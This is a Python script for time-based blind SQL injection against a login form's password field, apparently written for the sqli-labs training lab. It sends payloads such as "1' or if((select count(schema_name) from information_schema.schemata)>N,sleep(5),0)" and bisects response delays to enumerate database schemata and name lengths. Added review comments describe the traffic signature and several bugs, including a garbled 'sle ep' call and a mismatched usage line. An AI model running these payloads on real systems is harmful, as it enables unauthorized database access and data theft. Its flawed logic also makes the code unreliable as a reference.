post时间注入脚本
import requests
import sys
import time
import pdb


class Injection():
    """Time-based boolean inference against a login form's ``passwd`` field.

    Every probe POSTs the form fields ``uname`` / ``passwd`` / ``submit`` and
    asks the database a yes/no question ("is this count/length greater than
    N?"). The answer is read from the response latency alone, and a bisection
    over the range 1..30 narrows N.

    Reading notes for reviewers and defenders:
      * The probes only work if the application concatenates the ``passwd``
        value into its SQL text; a parameterized query gives them nothing to
        act on.
      * The traffic has a recognisable shape: many POSTs in a row to one
        login URL, each carrying ``information_schema`` and a delay function
        in the password field, with response times split into a fast and a
        slow group.
    """

    def __init__(self):
        # Target URL; filled in from the command line by Usage().
        self.url = ""
        # Number of schemata that schemataLength() iterates over. Hard-coded
        # to 7 here; it is not taken from the value InjectionSchemaNumber()
        # stores in self.schemataNum.
        self.scheNum = 7
        # One inferred schema-name length per schema index.
        self.scheLen = []
        self.headers = {
            "Content-Type": "application/x-www-form-urlencoded"
        }

    def InjectionSchemaNumber(self):
        """Infer how many schemata exist and store it in ``self.schemataNum``.

        Bisection between 1 and 30: a response taking more than 5 whole
        seconds is read as "count > probe" and raises the lower bound,
        anything else lowers the upper bound. Unlike schemataLength(), this
        request is sent without ``self.headers``.
        """
        lower, upper = 1, 30
        probe = (lower + upper) // 2
        while upper > lower:
            # NOTE(review): the payload text is kept exactly as printed on
            # the page, including the space inside the delay function name,
            # which looks like a line-wrap artifact of the original post.
            payload = f"1' or if((select count(schema_name) from information_schema.schemata)>{probe},sle ep(5),0)-- +"
            form = {
                "uname": "admin",
                "passwd": payload,
                "submit": "Submit"
            }
            started = int(time.time())
            try:
                requests.post(self.url, data=form)
            except Exception as err:
                # A failed request is only printed; control still reaches the
                # latency comparison below, so the failure is scored like any
                # other response.
                print(err)
            finally:
                finished = int(time.time())
            slow = finished - started > 5
            if slow:
                lower = probe
            else:
                upper = probe
            probe = (lower + upper) // 2
            # Bounds are adjacent and the midpoint sits on the lower one:
            # the upper bound is taken as the answer.
            if upper - lower == 1 and probe == lower:
                self.schemataNum = upper
                return
        self.schemataNum = probe

    def Usage(self):
        """Read the target URL from ``sys.argv``, or print usage and exit(-1).

        Exactly one argument (the URL) is accepted. NOTE(review): the printed
        example shows two further arguments, which this check would reject.
        """
        if len(sys.argv) == 2:
            self.url = sys.argv[1]
            return
        print('The number of parameter number not right')
        print('Usage:python3 %s url ' % sys.argv[0])
        print("Example:python3 postInjection.py http://192.168.62.249/login.php username=admin&password=admin password")
        sys.exit(-1)

    def schemataLength(self):
        """Infer the name length of each schema and append it to ``self.scheLen``.

        Runs the same 1..30 bisection as InjectionSchemaNumber(), once per
        schema index in ``range(self.scheNum)``, and prints the bounds and the
        measured delay of every probe. Not called from the ``__main__`` block.
        """
        for index in range(self.scheNum):
            lower, upper = 1, 30
            probe = (lower + upper) // 2
            while upper > lower:
                print(upper, lower, probe, end=" ")
                # Author's note (translated): why sleep(1) while the check is
                # "now - last > 5" -- when testing against sqli-labs lesson 13,
                # sleep(1) produced now-last > 13s. (The payload below uses
                # sleep(2), not sleep(1); presumably the delay is applied once
                # per row the query evaluates -- TODO confirm.)
                payload = f"1' or if((select length(schema_name) from information_schema.schemata limit {index},1)>{probe},sleep(2),0)#"
                form = {
                    "uname": "admin",
                    "passwd": payload,
                    "submit": "Submit"
                }
                started = int(time.time())
                try:
                    requests.post(self.url, headers=self.headers, data=form)
                except Exception as err:
                    # Printed only; the failed request is still scored by the
                    # latency comparison below.
                    print(err)
                finally:
                    finished = int(time.time())
                elapsed = finished - started
                print(elapsed)
                if elapsed > 5:
                    lower = probe
                else:
                    upper = probe
                probe = (lower + upper) // 2
                if upper - lower == 1 and probe == lower:
                    self.scheLen.append(upper)
                    break
            else:
                # Loop ended because the bounds met, not via the break above.
                self.scheLen.append(probe)


if __name__ == '__main__':
    inject = Injection()
    inject.Usage()
    inject.InjectionSchemaNumber()
    print(inject.schemataNum)